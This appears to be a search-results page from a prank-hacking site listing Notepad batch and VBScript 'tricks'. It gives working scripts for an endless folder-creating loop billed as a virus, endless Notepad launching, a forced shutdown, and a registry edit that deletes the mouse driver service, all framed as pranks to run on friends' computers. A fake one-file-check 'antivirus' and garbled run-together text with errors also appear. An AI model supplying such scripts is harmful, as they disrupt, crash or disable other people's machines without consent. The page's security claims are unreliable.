LenHacks
Get a Quote
You searched for "unlimited copies notepad"
13 results found.
how-to-create-dangerous-virus_15366268909Qixmj.jpeg
1) Open your notepad and typethe following code.@echo off:topmd %random%goto top2) Save it as 1000.bat@echo off makes your screenappear blank but it is actuallymaking hundreds of folders.md %random% is command thatcreating folders with randomnames.( md is a command tomake directory in ms-dos)goto top – return the commandto :top, causes an infinite loop.NOTE: The folders will get createdin the directory where you savedthe ”1000.bat” file.The file might look suspicious toyour friends. NB: cha...
create-a-simple-antivirus-with-notepad_15366249809pFB4K.jpeg
Step 1 to Create you OWN Antivirus using NotePadOpen a Notepad and copy the code below.@echo offtitle Antivirusecho Antivirusecho created by YOUR NAME:startIF EXIST virus.bat goto infectedIF NOT EXIST virus.bat goto cleancd C:Windowssystem32:infectedecho WARNING VIRUS DETECTED !del virus.batpausegoto start:cleanecho System secure!pauseexitYou can change the text in RED , with your name. The text in GREEN can be changed to show a different “Alert Message” which will be displayed if any virus is f...
unlimited-notepad-files_1536624331RgpV0v.jpeg
Unlimited Copies of notepad will be opening. Multiple Notepad files with no way to stop them. Open Notepad and copy/paste the below mentioned code:@ECHO off:topSTART%SystemRoot%\system32\notepad.exeGOTO topSave the file with .bat extension and exit Notepad. Now open Notepad.
pc-shuts-down-with-a-message_1536624040EI8FYK.jpeg
This can be quite friendly, people may think the PC is talking to them. all iOpen Notepad and copy/paste the below mentioned code:@echo offmsg * You make me work too much.shutdown -c “Error! okay that’s it, I quit! bye!!” -sSave the file with .bat extension and give a desired name. Executing the file will lead to the above mentioned stunt after a short delay.You can replace text of your own for custom messages.
keyboard-led-dance_1536623741sxHh8r.jpeg
Keyboard LED Dance make the three LED lights above the Number lock pad dance by turning on and off one after the other. Copy the below mentioned codein the Notepad:Set wshShell=wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{CAPSLOCK}”wshshell.sendkeys “{NUMLOCK}”wshshell.sendkeys “{SCROLLLOCK}”loop .Save the file with .vbs extension and close it. You can end with  “wscript.exe” program in the Task Manager or restart the PC to end it.
how-to-disable-mouse_1536623481SAlIg2.jpeg
Disable the mouse another amazing trick, Mouse functions to make the user think their mouse is broken. Open Notepad and copy/paste this. ; code:rem Disable Mouseset key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4Now, save the file with .vbs extension and close and restart the file
KEEP UP TO DATE

This site was designed with Websites.co.in - Website Builder

WhatsApp Google Map

Safety and Abuse Reporting

Thanks for being awesome!

We appreciate you contacting us. Our support will get back in touch with you soon!

Have a great day!

Are you sure you want to report abuse against this website?

Please note that your query will be processed only if we find it relevant. Rest all requests will be ignored. If you need help with the website, please login to your dashboard and connect to support

;